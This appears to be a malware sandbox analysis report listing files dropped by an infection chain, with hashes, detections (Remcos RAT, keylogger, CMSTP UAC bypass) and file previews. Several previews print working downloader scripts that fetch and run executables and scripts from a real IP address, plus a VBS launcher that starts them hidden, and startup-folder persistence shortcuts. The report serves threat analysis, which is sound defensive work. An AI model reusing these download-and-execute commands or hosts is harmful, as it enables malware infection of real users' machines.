                                        Preview:i&..k&..k&..j&..k&...&..~&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..OgY..g].OzD..Tf..@}.=Og..Qz.9Rh...D..SU..In..Kz.9Rh..Sy.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)I@..R`..Os./^..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)IJ..G}.#Hz..Hj.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..Oq@..o[.6k`..Iz..R'./rU..Gd..I{.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&....'.D.9.X...j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..

                                        C:\Users\user\AppData\Local\Temp\fc577906

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1234044
                                        Entropy (8bit):7.641699006020582
                                        Encrypted:false
                                        SSDEEP:24576:+J7RP83QjzweEpWlgBwn0xeRzJdIQlvC3/pSBWuR0H:+xq6weE0lgBVgJdnwPBuR0H
                                        MD5:078FFB5E81AA83A6463A8DED53CCBEE9
                                        SHA1:CF4D81BA015BE6DFEE50C589D47B6FFF4671401C
                                        SHA-256:871BC1C5673FCA6CA4949362A5980D7078603DF3206A8FF70619B1896A639343
                                        SHA-512:2A314A2384D37398B41325C642E4041E44301B324A12AE6324AB8C0AD40ABE19B5F85B613EE73A4A75055DC77FBA4F67EF3E738D07CEAF14703E17794FFB31E6
                                        Malicious:false
                                        Preview:i&..k&..k&..j&..k&...&..~&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..OgY..g].OzD..Tf..@}.=Og..Qz.9Rh...D..SU..In..Kz.9Rh..Sy.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)I@..R`..Os./^..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..)IJ..G}.#Hz..Hj.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..Oq@..o[.6k`..Iz..R'./rU..Gd..I{.j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..j&....'.D.9.X...j&..j&..j&..j&..j&..j&..j&..j&..j&..j&..

                                        C:\Users\user\AppData\Local\Temp\gps

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):500224
                                        Entropy (8bit):6.590620352205087
                                        Encrypted:false
                                        SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                        MD5:6CA401F82443B673FCA7D7DDB0A05357
                                        SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                        SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                        SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\gps, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\gps, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\gps, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gps, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\gps, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\gps, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 87%
                                        Joe Sandbox View:
                                        • Filename: MdkbG2pK4l.lnk, Detection: malicious, Browse
                                        • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                        • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\qapuwvr

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):500224
                                        Entropy (8bit):6.590620352205087
                                        Encrypted:false
                                        SSDEEP:6144:bTz+c6KHYBhDc1RGJdv//NkUn+N5Bkf/0TELRvIZPjbsAOZZ7AXpcrlT4h:bTlrYw1RUh3NFn+N5WfIQIjbs/Z79T4h
                                        MD5:6CA401F82443B673FCA7D7DDB0A05357
                                        SHA1:82E54CBDCF4E12A72A32E52E0FD03C095485B841
                                        SHA-256:7AA4BC94F891709D5B0FF9C2F95060AEEFB5AC6EB75222F9F105E29C3965629F
                                        SHA-512:A4FE6F7E935DC83D6F6C7CA5CF62AE97B2B2FFEC1E2E075CB436CEEECC2DBB27F515A8A0F6360176FE7AE4E273C413F1E922666A016C070B399DB253AA77614C
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: Joe Security
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: Joe Security
                                        • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: Joe Security
                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: unknown
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: unknown
                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Users\user\AppData\Local\Temp\qapuwvr, Author: ditekSHen
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 87%
                                        Joe Sandbox View:
                                        • Filename: MdkbG2pK4l.lnk, Detection: malicious, Browse
                                        • Filename: epht1Y3TGZ.exe, Detection: malicious, Browse
                                        • Filename: 55Ka50lb6Z.bat, Detection: malicious, Browse
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........{.-H..~H..~H..~..'~[..~..%~...~..$~V..~AbR~I..~..~J..~.D..R..~.D..r..~.D..j..~AbE~Q..~H..~v..~.D..,..~.D)~I..~.D..I..~RichH..~........................PE..L...s:.Z.................r...........J............@..........................@...........................................................H.......................;..P...8...............................@............................................text....q.......r.................. ..`.rdata...y.......z...v..............@..@.data...D]..........................@....tls.........p......................@....gfids..0...........................@..@.rsrc....H.......J..................@..@.reloc...;.......<...N..............@..Bcmxvoc... ... ......................@...........................................................................................................................................................

                                        C:\Users\user\AppData\Local\Temp\uvnhjq

                                        Download File
                                        Process:C:\Windows\SysWOW64\cmd.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                        Category:dropped
                                        Size (bytes):890
                                        Entropy (8bit):5.074549193620881
                                        Encrypted:false
                                        SSDEEP:24:8pHmYt6j2gDIlXUv36IfKTJxSsAVsHnuuhpm:8Zt6rDIlGJiV0VtuH
                                        MD5:B723D8F179AEEA3F07DA2DAD87CC2F31
                                        SHA1:4EA41E29717258185DF6597A94428469B8CC77BC
                                        SHA-256:FE2F4952D96406C2EFCAFDE91EB85D6EAFF99DC634A8B11DD40F590CD97AE60E
                                        SHA-512:781B908287C904DDCD5FE08CABCAF5A89D638DB1CFBF3AB35FE93D547FEF26BA5E4C13CF5ABDA6EE10C3CA20BBF441603415913A897982E3225AF87BA2D22E1D
                                        Malicious:false
                                        Preview:L..................F.... ....MM.i...+...i.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S.....}.i....P.i.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Y.............................^.A.p.p.D.a.t.a...B.V.1.....9Y....Roaming.@......EW<29Y....../.........................R.o.a.m.i.n.g.....b.1.....9Y....RUY_DR~1..J......9Y..9Y......=.........................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y..9Y......D.....................d...D.Z.I.P.R...e.x.e.......g...............-.......f............5.......C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......878411...........hT..CrF.f4... .r$..Jc...-...-$..hT..CrF.f4... .r$..Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                        C:\Users\user\AppData\Roaming\AUGUST.exe

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):4809996
                                        Entropy (8bit):7.988259707956486
                                        Encrypted:false
                                        SSDEEP:98304:+pbYDHaUeRG/GnYDievJRVrQo4QGB0s53+sTH7/93veWGLRHHk:+pbu9e+qYDiQf1hfGWsBVb/rGLhE
                                        MD5:25860926414BF43383246F7C773A8D6C
                                        SHA1:760390A4A14DF085F4C841067F52C79409CDC93E
                                        SHA-256:A8E552944846A2F5E8FEFEA4A250046DA29D74D1F58F7A868258E6DED9597958
                                        SHA-512:61825EF1B03F5516F2820FAAE3DAD01911054DEBB714B2162FD28CDC7C26199EB6174EDDB3E48A4B200C350A083A561A58BD2724496FCB71E87D4492E2EC5A07
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 3%
                                        Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...~.&L.....................................0....@..........................0.......3.......................................P.......................................................................................0...............................text............................... ..`.rdata...0...0...2..................@..@.data...,)...p.......H..............@....rsrc................P..............@..@........U.......SVWj'.....u..v..=`2A..6P......P..e......~..v8.^..3......h.3A.P..........P......P..p1A..E..E....;F.r......P.,f..Y.-..j...t1A...t$..l....3.9..wA.t...@....9D$.t..t$.Ph.....5.wA....2A.3.....D$..`...|$..u..@.....3.....D$...V...t...P.Q...^....T$.V.t$......f..BBFFf..u.^.L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q......3.9F.Y~.9F.~...f..Af..G@;F.|..6....Y.F..>f.$G..^._^[...U..QQ..lwA..uVj.j..E.P.5.wA...l1A...t>.E.;E.w6r..E.;E.s,j*.....P.He.....YYt...(wA.j.....@... .

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmp

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                        Category:dropped
                                        Size (bytes):890
                                        Entropy (8bit):5.074549193620881
                                        Encrypted:false
                                        SSDEEP:24:8pHmYt6j2gDIlXUv36IfKTJxSsAVsHnuuhpm:8Zt6rDIlGJiV0VtuH
                                        MD5:B723D8F179AEEA3F07DA2DAD87CC2F31
                                        SHA1:4EA41E29717258185DF6597A94428469B8CC77BC
                                        SHA-256:FE2F4952D96406C2EFCAFDE91EB85D6EAFF99DC634A8B11DD40F590CD97AE60E
                                        SHA-512:781B908287C904DDCD5FE08CABCAF5A89D638DB1CFBF3AB35FE93D547FEF26BA5E4C13CF5ABDA6EE10C3CA20BBF441603415913A897982E3225AF87BA2D22E1D
                                        Malicious:false
                                        Preview:L..................F.... ....MM.i...+...i.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S.....}.i....P.i.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Y.............................^.A.p.p.D.a.t.a...B.V.1.....9Y....Roaming.@......EW<29Y....../.........................R.o.a.m.i.n.g.....b.1.....9Y....RUY_DR~1..J......9Y..9Y......=.........................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y..9Y......D.....................d...D.Z.I.P.R...e.x.e.......g...............-.......f............5.......C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......878411...........hT..CrF.f4... .r$..Jc...-...-$..hT..CrF.f4... .r$..Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oracledemo_dbg.lnk (copy)

                                        Download File
                                        Process:C:\Windows\System32\svchost.exe
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 25 15:40:34 2024, mtime=Wed Sep 25 15:40:34 2024, atime=Wed Sep 25 10:50:28 2024, length=8767704, window=hide
                                        Category:dropped
                                        Size (bytes):890
                                        Entropy (8bit):5.074549193620881
                                        Encrypted:false
                                        SSDEEP:24:8pHmYt6j2gDIlXUv36IfKTJxSsAVsHnuuhpm:8Zt6rDIlGJiV0VtuH
                                        MD5:B723D8F179AEEA3F07DA2DAD87CC2F31
                                        SHA1:4EA41E29717258185DF6597A94428469B8CC77BC
                                        SHA-256:FE2F4952D96406C2EFCAFDE91EB85D6EAFF99DC634A8B11DD40F590CD97AE60E
                                        SHA-512:781B908287C904DDCD5FE08CABCAF5A89D638DB1CFBF3AB35FE93D547FEF26BA5E4C13CF5ABDA6EE10C3CA20BBF441603415913A897982E3225AF87BA2D22E1D
                                        Malicious:false
                                        Preview:L..................F.... ....MM.i...+...i.......A............................:..DG..Yr?.D..U..k0.&...&.......$..S.....}.i....P.i.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<29Y.............................^.A.p.p.D.a.t.a...B.V.1.....9Y....Roaming.@......EW<29Y....../.........................R.o.a.m.i.n.g.....b.1.....9Y....RUY_DR~1..J......9Y..9Y......=.........................R.u.y._.d.r.i.v.e.r.v.2.....\.2....9YO^ .DZIPR.exe.D......9Y..9Y......D.....................d...D.Z.I.P.R...e.x.e.......g...............-.......f............5.......C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe..$.....\.....\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.`.......X.......878411...........hT..CrF.f4... .r$..Jc...-...-$..hT..CrF.f4... .r$..Jc...-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                        C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll

                                        Download File
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):354304
                                        Entropy (8bit):6.005348176071358
                                        Encrypted:false
                                        SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                                        MD5:AD28D4167571382569D2384FFD7BD2A9
                                        SHA1:EFC7534BCB1645D4056702E073519F571D8DB77B
                                        SHA-256:F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
                                        SHA-512:8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................

                                        C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe

                                        Download File
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):8767704
                                        Entropy (8bit):7.112848215947183
                                        Encrypted:false
                                        SSDEEP:196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
                                        MD5:EC9CE1D67F98072281015C7726FBA245
                                        SHA1:E89B16265ACF4A251B527DDF22830F2650987263
                                        SHA-256:9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
                                        SHA-512:21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
                                        Malicious:true
                                        Yara Hits:
                                        • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe, Author: Joe Security
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................

                                        C:\Users\user\AppData\Roaming\Ruy_driverv2\ekqqtq

                                        Download File
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):975374
                                        Entropy (8bit):7.888212877886324
                                        Encrypted:false
                                        SSDEEP:24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
                                        MD5:4649F3A4E58C6040B07F6D486C149A71
                                        SHA1:64F8FC631C5FB4E5F6BC20C207047D8E2B500587
                                        SHA-256:5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
                                        SHA-512:4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
                                        Malicious:false
                                        Preview:...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...

                                        C:\Users\user\AppData\Roaming\Ruy_driverv2\ipqtwm

                                        Download File
                                        Process:C:\Users\user\DZIPR.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):72329
                                        Entropy (8bit):4.4816230098296295
                                        Encrypted:false
                                        SSDEEP:1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
                                        MD5:F125E72B3968CA233EF3C7E2F4DB34E7
                                        SHA1:4FB34044EF18CEDBD3EDE4272C44416D3F11735C
                                        SHA-256:CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
                                        SHA-512:B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
                                        Malicious:false
                                        Preview:]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...

                                        C:\Users\user\AppData\Roaming\ffo.bat

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):116
                                        Entropy (8bit):4.962458979597571
                                        Encrypted:false
                                        SSDEEP:3:mKDDGKSSJJFSpXLgLvzx0fyJAFAkKiv5iwW0r+KBpkiv5iwW0rv:hSGmp6vd0fy78ha0rhppha0rv
                                        MD5:174D3AD77319DC90564354CAD267DABF
                                        SHA1:B36284DCCF4F4D2A7E671D5A2F9DDA8197A4C351
                                        SHA-256:CE2A0FA3EF54C0596A6AA5E4D9E2F06943F0F7E38841823072BD37DF73C47569
                                        SHA-512:FA78883AF47A9B47D738DD8ACC2990A3CBA9339B8A762A7AC98114810A50F9085D223226D00944D814FCE5FF43114BC87656AFAF752D86AE08A8818B257A40FB
                                        Malicious:true
                                        Preview:@echo off..powershell wget http://172.94.3.25/AUGUST.exe -OutFile %APPDATA%/AUGUST.exe..start %APPDATA%/AUGUST.exe..

                                        C:\Users\user\AppData\Roaming\hello.bat

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:DOS batch file, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):191
                                        Entropy (8bit):5.080483099180641
                                        Encrypted:false
                                        SSDEEP:3:mKDDGKSSJJFSpXLgL+h9JAFAkKivDWMdzGSJJFSpXLgLLHLqXJAFAkKivNJKTmw9:hSGmp6+h978bWMdz9mp6LrqX78VgGppC
                                        MD5:4D8B2D19BDD29E6D89E0769CFF9B0B48
                                        SHA1:07C4469751A5DDF43288B8EA7D32AFCE71783A2C
                                        SHA-256:1F09EDF42FA70F1D36DF268EEF5B64EA5617485D1A511F674740DECFCEBDEA1E
                                        SHA-512:DD00356E9FDF149C9890BF71459A5E20B5BC581D62C7A3964A18AAFFB32BD7E5210CC9AA8D6251E87BA4BA3AC803B5E720C66ECF161A546A4D36409D1311D3DC
                                        Malicious:true
                                        Preview:@echo off..powershell wget http://172.94.3.25/ffo.bat -OutFile %APPDATA%/ffo.bat..powershell wget http://172.94.3.25/hi.vbs -OutFile %APPDATA%/hi.vbs..start /min cmd /c %APPDATA%/hi.vbs..exit

                                        C:\Users\user\AppData\Roaming\hi.vbs

                                        Download File
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):126
                                        Entropy (8bit):4.948021064615188
                                        Encrypted:false
                                        SSDEEP:3:jaPFEm8nByK2qQANX4E71wivDWMZcNUqJajaPOUC:j6NqEK20XNNbWMiNUqOUC
                                        MD5:CAA7E3E2DB71FA6B41370A69D134FDBA
                                        SHA1:659CEC895D5348E9E1B85823CC9A8F0E165F21CF
                                        SHA-256:183E1E3B20EA35804DDF2D6102AA4E854730A93F076BB6FE43075B0394D18945
                                        SHA-512:346F1858A1861D16BF8E858867DEAA1653124085C0C320A2776C1A8131E93E6AF15156EC6B8457B3648F837485AD4EAC584EE83B859F97CBAA80F38B2BF68EFD
                                        Malicious:true
                                        Preview:Set WshShell = CreateObject("WScript.Shell") ..WshShell.Run chr(34) & "%APPDATA%/ffo.bat" & Chr(34), 0..Set WshShell = Nothing

                                        C:\Users\user\DZIPR.dll

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\AUGUST.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):354304
                                        Entropy (8bit):6.005348176071358
                                        Encrypted:false
                                        SSDEEP:6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
                                        MD5:AD28D4167571382569D2384FFD7BD2A9
